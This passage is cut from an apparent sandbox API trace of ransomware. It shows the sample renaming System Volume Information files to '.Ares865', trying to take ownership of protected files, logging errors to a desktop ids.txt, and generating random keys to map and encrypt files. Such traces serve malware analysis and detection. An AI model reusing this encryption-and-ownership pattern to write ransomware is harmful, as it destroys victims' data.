Information\\{b8daad68-66a7-11e7-8a16-c43dc7584a00}{3808876b-c176-4e48-b7ae-04046e6cc752}" (normalized: "c:\\system volume information\\{b8daad68-66a7-11e7-8a16-c43dc7584a00}{3808876b-c176-4e48-b7ae-04046e6cc752}"), lpNewFileName="C:\\System Volume Information\\{b8daad68-66a7-11e7-8a16-c43dc7584a00}{3808876b-c176-4e48-b7ae-04046e6cc752}.Ares865" (normalized: "c:\\system volume information\\{b8daad68-66a7-11e7-8a16-c43dc7584a00}{3808876b-c176-4e48-b7ae-04046e6cc752}.ares865"), dwFlags=0x1) returned 0 [0112.595] GetLastError () returned 0x5 [0112.595] AllocateAndInitializeSid (in: pIdentifierAuthority=0x2ccd148, nSubAuthorityCount=0x1, nSubAuthority0=0x0, nSubAuthority1=0x0, nSubAuthority2=0x0, nSubAuthority3=0x0, nSubAuthority4=0x0, nSubAuthority5=0x0, nSubAuthority6=0x0, nSubAuthority7=0x0, pSid=0x2ccd158 | out: pSid=0x2ccd158*=0x2cb658*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x1), SubAuthority=0x0)) returned 1 [0112.595] AllocateAndInitializeSid (in: pIdentifierAuthority=0x2ccd140, nSubAuthorityCount=0x2, nSubAuthority0=0x20, nSubAuthority1=0x220, nSubAuthority2=0x0, nSubAuthority3=0x0, nSubAuthority4=0x0, nSubAuthority5=0x0, nSubAuthority6=0x0, nSubAuthority7=0x0, pSid=0x2ccd164 | out: pSid=0x2ccd164*=0x2cb610*(Revision=0x1, SubAuthorityCount=0x2, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x20, [1]=0x0))) returned 1 [0112.595] SetEntriesInAclW () returned 0x0 [0112.595] SetNamedSecurityInfoW () returned 0x5 [0112.595] SetNamedSecurityInfoW () returned 0x5 [0112.595] LocalFree (hMem=0x2ccee8) returned 0x0 [0112.595] wsprintfA (in: param_1=0x2ccd7d8, param_2="[ERROR] %S MoveFileEx TakeOwnership error %i\r\n" | out: param_1="[ERROR] C:\\System Volume Information\\{b8daad68-66a7-11e7-8a16-c43dc7584a00}{3808876b-c176-4e48-b7ae-04046e6cc752} MoveFileEx TakeOwnership error 5\r\n") returned 148 [0112.595] lstrlenA (lpString="[ERROR] C:\\System Volume Information\\{b8daad68-66a7-11e7-8a16-c43dc7584a00}{3808876b-c176-4e48-b7ae-04046e6cc752} MoveFileEx TakeOwnership error 5\r\n") returned 148 [0112.595] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ids.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\ids.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x118 [0112.596] SetFilePointer (in: hFile=0x118, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x9902 [0112.596] WriteFile (in: hFile=0x118, lpBuffer=0x2ccd7d8*, nNumberOfBytesToWrite=0x94, lpNumberOfBytesWritten=0x2ccd174, lpOverlapped=0x0 | out: lpBuffer=0x2ccd7d8*, lpNumberOfBytesWritten=0x2ccd174*=0x94, lpOverlapped=0x0) returned 1 [0112.596] CloseHandle (hObject=0x118) returned 1 [0112.596] UnmapViewOfFile (lpBaseAddress=0x0) returned 0 [0112.596] CloseHandle (hObject=0x0) returned 0 [0112.597] CloseHandle (hObject=0x0) returned 0 [0112.597] FindNextFileW (in: hFindFile=0x2ccde8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0xbfe440b0, ftCreationTime.dwHighDateTime=0x1d2fab4, ftLastAccessTime.dwLowDateTime=0xbfe440b0, ftLastAccessTime.dwHighDateTime=0x1d2fab4, ftLastWriteTime.dwLowDateTime=0xf8d3dce0, ftLastWriteTime.dwHighDateTime=0x1d2fc27, nFileSizeHigh=0x0, nFileSizeLow=0xcd7c000, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="{b8daad8b-66a7-11e7-8a16-c43dc7584a00}{3808876b-c176-4e48-b7ae-04046e6cc752}", cAlternateFileName="{B8DAA~3")) returned 1 [0112.597] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\System Volume Information\\{b8daad8b-66a7-11e7-8a16-c43dc7584a00}{3808876b-c176-4e48-b7ae-04046e6cc752}.Ares865") returned 113 [0112.597] MoveFileExW (lpExistingFileName="C:\\System Volume Information\\{b8daad8b-66a7-11e7-8a16-c43dc7584a00}{3808876b-c176-4e48-b7ae-04046e6cc752}" (normalized: "c:\\system volume information\\{b8daad8b-66a7-11e7-8a16-c43dc7584a00}{3808876b-c176-4e48-b7ae-04046e6cc752}"), lpNewFileName="C:\\System Volume Information\\{b8daad8b-66a7-11e7-8a16-c43dc7584a00}{3808876b-c176-4e48-b7ae-04046e6cc752}.Ares865" (normalized: "c:\\system volume information\\{b8daad8b-66a7-11e7-8a16-c43dc7584a00}{3808876b-c176-4e48-b7ae-04046e6cc752}.ares865"), dwFlags=0x1) returned 0 [0112.597] GetLastError () returned 0x5 [0112.597] AllocateAndInitializeSid (in: pIdentifierAuthority=0x2ccd148, nSubAuthorityCount=0x1, nSubAuthority0=0x0, nSubAuthority1=0x0, nSubAuthority2=0x0, nSubAuthority3=0x0, nSubAuthority4=0x0, nSubAuthority5=0x0, nSubAuthority6=0x0, nSubAuthority7=0x0, pSid=0x2ccd158 | out: pSid=0x2ccd158*=0x2cb658*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x1), SubAuthority=0x0)) returned 1 [0112.597] AllocateAndInitializeSid (in: pIdentifierAuthority=0x2ccd140, nSubAuthorityCount=0x2, nSubAuthority0=0x20, nSubAuthority1=0x220, nSubAuthority2=0x0, nSubAuthority3=0x0, nSubAuthority4=0x0, nSubAuthority5=0x0, nSubAuthority6=0x0, nSubAuthority7=0x0, pSid=0x2ccd164 | out: pSid=0x2ccd164*=0x2cb610*(Revision=0x1, SubAuthorityCount=0x2, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x20, [1]=0x0))) returned 1 [0112.597] SetEntriesInAclW () returned 0x0 [0112.597] SetNamedSecurityInfoW () returned 0x5 [0112.597] SetNamedSecurityInfoW () returned 0x5 [0112.597] LocalFree (hMem=0x2ccee8) returned 0x0 [0112.597] wsprintfA (in: param_1=0x2ccd7d8, param_2="[ERROR] %S MoveFileEx TakeOwnership error %i\r\n" | out: param_1="[ERROR] C:\\System Volume Information\\{b8daad8b-66a7-11e7-8a16-c43dc7584a00}{3808876b-c176-4e48-b7ae-04046e6cc752} MoveFileEx TakeOwnership error 5\r\n") returned 148 [0112.597] lstrlenA (lpString="[ERROR] C:\\System Volume Information\\{b8daad8b-66a7-11e7-8a16-c43dc7584a00}{3808876b-c176-4e48-b7ae-04046e6cc752} MoveFileEx TakeOwnership error 5\r\n") returned 148 [0112.597] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ids.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\ids.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x118 [0112.598] SetFilePointer (in: hFile=0x118, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x9996 [0112.598] WriteFile (in: hFile=0x118, lpBuffer=0x2ccd7d8*, nNumberOfBytesToWrite=0x94, lpNumberOfBytesWritten=0x2ccd174, lpOverlapped=0x0 | out: lpBuffer=0x2ccd7d8*, lpNumberOfBytesWritten=0x2ccd174*=0x94, lpOverlapped=0x0) returned 1 [0112.598] CloseHandle (hObject=0x118) returned 1 [0112.598] UnmapViewOfFile (lpBaseAddress=0x0) returned 0 [0112.599] CloseHandle (hObject=0x0) returned 0 [0112.599] CloseHandle (hObject=0x0) returned 0 [0112.599] FindNextFileW (in: hFindFile=0x2ccde8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0xbfe440b0, ftCreationTime.dwHighDateTime=0x1d2fab4, ftLastAccessTime.dwLowDateTime=0xbfe440b0, ftLastAccessTime.dwHighDateTime=0x1d2fab4, ftLastWriteTime.dwLowDateTime=0xf8d3dce0, ftLastWriteTime.dwHighDateTime=0x1d2fc27, nFileSizeHigh=0x0, nFileSizeLow=0xcd7c000, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="{b8daad8b-66a7-11e7-8a16-c43dc7584a00}{3808876b-c176-4e48-b7ae-04046e6cc752}", cAlternateFileName="{B8DAA~3")) returned 0 [0112.599] FindClose (in: hFindFile=0x2ccde8 | out: hFindFile=0x2ccde8) returned 1 [0112.599] RtlInterlockedPopEntrySList (in: ListHead=0x2e7710 | out: ListHead=0x2e7710) returned 0x2e7950 [0112.599] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\System Volume Information\\SPP\\SppGroupCache\\{00C95144-E912-40B3-A2D1-B8E12BC815D0}_DriverPackageInfo.Ares865") returned 111 [0112.599] MoveFileExW (lpExistingFileName="C:\\System Volume Information\\SPP\\SppGroupCache\\{00C95144-E912-40B3-A2D1-B8E12BC815D0}_DriverPackageInfo" (normalized: "c:\\system volume information\\spp\\sppgroupcache\\{00c95144-e912-40b3-a2d1-b8e12bc815d0}_driverpackageinfo"), lpNewFileName="C:\\System Volume Information\\SPP\\SppGroupCache\\{00C95144-E912-40B3-A2D1-B8E12BC815D0}_DriverPackageInfo.Ares865" (normalized: "c:\\system volume information\\spp\\sppgroupcache\\{00c95144-e912-40b3-a2d1-b8e12bc815d0}_driverpackageinfo.ares865"), dwFlags=0x1) returned 1 [0112.601] CreateFileW (lpFileName="C:\\System Volume Information\\SPP\\SppGroupCache\\{00C95144-E912-40B3-A2D1-B8E12BC815D0}_DriverPackageInfo.Ares865" (normalized: "c:\\system volume information\\spp\\sppgroupcache\\{00c95144-e912-40b3-a2d1-b8e12bc815d0}_driverpackageinfo.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0112.601] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=56376) returned 1 [0112.601] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0112.602] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0112.602] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0112.602] CreateFileMappingW (hFile=0x118, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0xdf40, lpName=0x0) returned 0x170 [0112.604] MapViewOfFile (hFileMappingObject=0x170, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0xdf40) returned 0x190000 [0112.610] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0112.610] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0112.611] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0112.612] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\System Volume Information\\SPP\\SppGroupCache\\{00C95144-E912-40B3-A2D1-B8E12BC815D0}_WindowsUpdateInfo.Ares865") returned 111 [0112.612] MoveFileExW (lpExistingFileName="C:\\System Volume Information\\SPP\\SppGroupCache\\{00C95144-E912-40B3-A2D1-B8E12BC815D0}_WindowsUpdateInfo" (normalized: "c:\\system volume information\\spp\\sppgroupcache\\{00c95144-e912-40b3-a2d1-b8e12bc815d0}_windowsupdateinfo"), lpNewFileName="C:\\System Volume Information\\SPP\\SppGroupCache\\{00C95144-E912-40B3-A2D1-B8E12BC815D0}_WindowsUpdateInfo.Ares865" (normalized: "c:\\system volume information\\spp\\sppgroupcache\\{00c95144-e912-40b3-a2d1-b8e12bc815d0}_windowsupdateinfo.ares865"), dwFlags=0x1) returned 1 [0112.614] CreateFileW (lpFileName="C:\\System Volume Information\\SPP\\SppGroupCache\\{00C95144-E912-40B3-A2D1-B8E12BC815D0}_WindowsUpdateInfo.Ares865" (normalized: "c:\\system volume information\\spp\\sppgroupcache\\{00c95144-e912-40b3-a2d1-b8e12bc815d0}_windowsupdateinfo.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0112.614] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=264) returned 1 [0112.614] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0112.615] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0112.615] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0112.615] CreateFileMappingW (hFile=0x118, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x410, lpName=0x0) returned 0x170 [0112.617] MapViewOfFile (hFileMappingObject=0x170, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x410) returned 0x190000 [0112.618] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0112.618] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0112.618] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0112.619] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\System Volume Information\\SPP\\SppGroupCache\\{1CE95DD8-C40B-44FD-A9E6-D72D44ED8F39}_DriverPackageInfo.Ares865") returned 111 [0112.619] MoveFileExW (lpExistingFileName="C:\\System Volume Information\\SPP\\SppGroupCache\\{1CE95DD8-C40B-44FD-A9E6-D72D44ED8F39}_DriverPackageInfo" (normalized: "c:\\system volume information\\spp\\sppgroupcache\\{1ce95dd8-c40b-44fd-a9e6-d72d44ed8f39}_driverpackageinfo"), lpNewFileName="C:\\System Volume Information\\SPP\\SppGroupCache\\{1CE95DD8-C40B-44FD-A9E6-D72D44ED8F39}_DriverPackageInfo.Ares865" (normalized: "c:\\system volume information\\spp\\sppgroupcache\\{1ce95dd8-c40b-44fd-a9e6-d72d44ed8f39}_driverpackageinfo.ares865"), dwFlags=0x1) returned 1 [0112.620] CreateFileW (lpFileName="C:\\System Volume Information\\SPP\\SppGroupCache\\{1CE95DD8-C40B-44FD-A9E6-D72D44ED8F39}_DriverPackageInfo.Ares865" (normalized: "c:\\system volume information\\spp\\sppgroupcache\\{1ce95dd8-c40b-44fd-a9e6-d72d44ed8f39}_driverpackageinfo.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0112.620] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=56376) returned 1 [0112.620] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0112.621] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0112.621] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0112.621] CreateFileMappingW (hFile=0x118, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0xdf40, lpName=0x0) returned 0x170 [0112.623] MapViewOfFile (hFileMappingObject=0x170, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0xdf40) returned 0x190000 [0112.626] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0112.627] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0112.627] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0112.628] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\System Volume Information\\SPP\\SppGroupCache\\{1CE95DD8-C40B-44FD-A9E6-D72D44ED8F39}_WindowsUpdateInfo.Ares865") returned 111 [0112.628] MoveFileExW (lpExistingFileName="C:\\System Volume Information\\SPP\\SppGroupCache\\{1CE95DD8-C40B-44FD-A9E6-D72D44ED8F39}_WindowsUpdateInfo" (normalized: "c:\\system volume information\\spp\\sppgroupcache\\{1ce95dd8-c40b-44fd-a9e6-d72d44ed8f39}_windowsupdateinfo"), lpNewFileName="C:\\System Volume Information\\SPP\\SppGroupCache\\{1CE95DD8-C40B-44FD-A9E6-D72D44ED8F39}_WindowsUpdateInfo.Ares865" (normalized: "c:\\system volume information\\spp\\sppgroupcache\\{1ce95dd8-c40b-44fd-a9e6-d72d44ed8f39}_windowsupdateinfo.ares865"), dwFlags=0x1) returned 1 [0112.629] CreateFileW (lpFileName="C:\\System Volume Information\\SPP\\SppGroupCache\\{1CE95DD8-C40B-44FD-A9E6-D72D44ED8F39}_WindowsUpdateInfo.Ares865" (normalized: "c:\\system volume information\\spp\\sppgroupcache\\{1ce95dd8-c40b-44fd-a9e6-d72d44ed8f39}_windowsupdateinfo.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0112.629] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=264) returned 1 [0112.630] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0112.630] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0112.630] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0112.631] CreateFileMappingW (hFile=0x118, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x410, lpName=0x0) returned 0x170 [0112.633] MapViewOfFile (hFileMappingObject=0x170, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x410) returned 0x190000 [0112.633] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0112.634] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0112.634] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0112.635] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\System Volume Information\\SPP\\SppGroupCache\\{1E9425CC-553B-418F-B0C6-AD1AC9E1BA0C}_DriverPackageInfo.Ares865") returned 111 [0112.635] MoveFileExW (lpExistingFileName="C:\\System Volume Information\\SPP\\SppGroupCache\\{1E9425CC-553B-418F-B0C6-AD1AC9E1BA0C}_DriverPackageInfo" (normalized: "c:\\system volume information\\spp\\sppgroupcache\\{1e9425cc-553b-418f-b0c6-ad1ac9e1ba0c}_driverpackageinfo"), lpNewFileName="C:\\System Volume Information\\SPP\\SppGroupCache\\{1E9425CC-553B-418F-B0C6-AD1AC9E1BA0C}_DriverPackageInfo.Ares865" (normalized: "c:\\system volume information\\spp\\sppgroupcache\\{1e9425cc-553b-418f-b0c6-ad1ac9e1ba0c}_driverpackageinfo.ares865"), dwFlags=0x1) returned 1 [0112.636] CreateFileW (lpFileName="C:\\System Volume Information\\SPP\\SppGroupCache\\{1E9425CC-553B-418F-B0C6-AD1AC9E1BA0C}_DriverPackageInfo.Ares865" (normalized: "c:\\system volume information\\spp\\sppgroupcache\\{1e9425cc-553b-418f-b0c6-ad1ac9e1ba0c}_driverpackageinfo.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0112.636] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=56376) returned 1 [0112.637] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0112.637] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0112.637] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0112.637] CreateFileMappingW (hFile=0x118, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0xdf40, lpName=0x0) returned 0x170 [0112.639] MapViewOfFile (hFileMappingObject=0x170, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0xdf40) returned 0x190000 [0112.647] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0112.648] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0112.648] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0112.649] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\System Volume Information\\SPP\\SppGroupCache\\{1E9425CC-553B-418F-B0C6-AD1AC9E1BA0C}_WindowsUpdateInfo.Ares865") returned 111 [0112.649] MoveFileExW (lpExistingFileName="C:\\System Volume Information\\SPP\\SppGroupCache\\{1E9425CC-553B-418F-B0C6-AD1AC9E1BA0C}_WindowsUpdateInfo" (normalized: "c:\\system volume information\\spp\\sppgroupcache\\{1e9425cc-553b-418f-b0c6-ad1ac9e1ba0c}_windowsupdateinfo"), lpNewFileName="C:\\System Volume Information\\SPP\\SppGroupCache\\{1E9425CC-553B-418F-B0C6-AD1AC9E1BA0C}_WindowsUpdateInfo.Ares865" (normalized: "c:\\system volume information\\spp\\sppgroupcache\\{1e9425cc-553b-418f-b0c6-ad1ac9e1ba0c}_windowsupdateinfo.ares865"), dwFlags=0x1) returned 1 [0112.650] CreateFileW (lpFileName="C:\\System Volume Information\\SPP\\SppGroupCache\\{1E9425CC-553B-418F-B0C6-AD1AC9E1BA0C}_WindowsUpdateInfo.Ares865" (normalized: "c:\\system volume information\\spp\\sppgroupcache\\{1e9425cc-553b-418f-b0c6-ad1ac9e1ba0c}_windowsupdateinfo.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0112.650] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=432) returned 1 [0112.651] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0112.651] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0112.651] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0112.651] CreateFileMappingW (hFile=0x118, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x4b0, lpName=0x0) returned 0x170 [0112.664] MapViewOfFile (hFileMappingObject=0x170, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x4b0) returned 0x190000 [0112.668] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0112.670] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0112.670] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0112.671] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\System Volume Information\\SPP\\SppGroupCache\\{29088C66-DE5F-456F-85C0-6E4156F94358}_DriverPackageInfo.Ares865") returned 111 [0112.671] MoveFileExW (lpExistingFileName="C:\\System Volume Information\\SPP\\SppGroupCache\\{29088C66-DE5F-456F-85C0-6E4156F94358}_DriverPackageInfo" (normalized: "c:\\system volume information\\spp\\sppgroupcache\\{29088c66-de5f-456f-85c0-6e4156f94358}_driverpackageinfo"), lpNewFileName="C:\\System Volume Information\\SPP\\SppGroupCache\\{29088C66-DE5F-456F-85C0-6E4156F94358}_DriverPackageInfo.Ares865" (normalized: "c:\\system volume information\\spp\\sppgroupcache\\{29088c66-de5f-456f-85c0-6e4156f94358}_driverpackageinfo.ares865"), dwFlags=0x1) returned 1 [0112.676] CreateFileW (lpFileName="C:\\System Volume Information\\SPP\\SppGroupCache\\{29088C66-DE5F-456F-85C0-6E4156F94358}_DriverPackageInfo.Ares865" (normalized: "c:\\system volume information\\spp\\sppgroupcache\\{29088c66-de5f-456f-85c0-6e4156f94358}_driverpackageinfo.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0112.677] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=56376) returned 1 [0112.678] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0112.681] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0112.681] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0112.681] CreateFileMappingW (hFile=0x118, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0xdf40, lpName=0x0) returned 0x170 [0112.683] MapViewOfFile (hFileMappingObject=0x170, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0xdf40) returned 0x190000 [0112.691] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0112.692] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0112.692] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0112.693] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\System Volume Information\\SPP\\SppGroupCache\\{29088C66-DE5F-456F-85C0-6E4156F94358}_WindowsUpdateInfo.Ares865") returned 111 [0112.693] MoveFileExW (lpExistingFileName="C:\\System Volume Information\\SPP\\SppGroupCache\\{29088C66-DE5F-456F-85C0-6E4156F94358}_WindowsUpdateInfo" (normalized: "c:\\system volume information\\spp\\sppgroupcache\\{29088c66-de5f-456f-85c0-6e4156f94358}_windowsupdateinfo"), lpNewFileName="C:\\System Volume 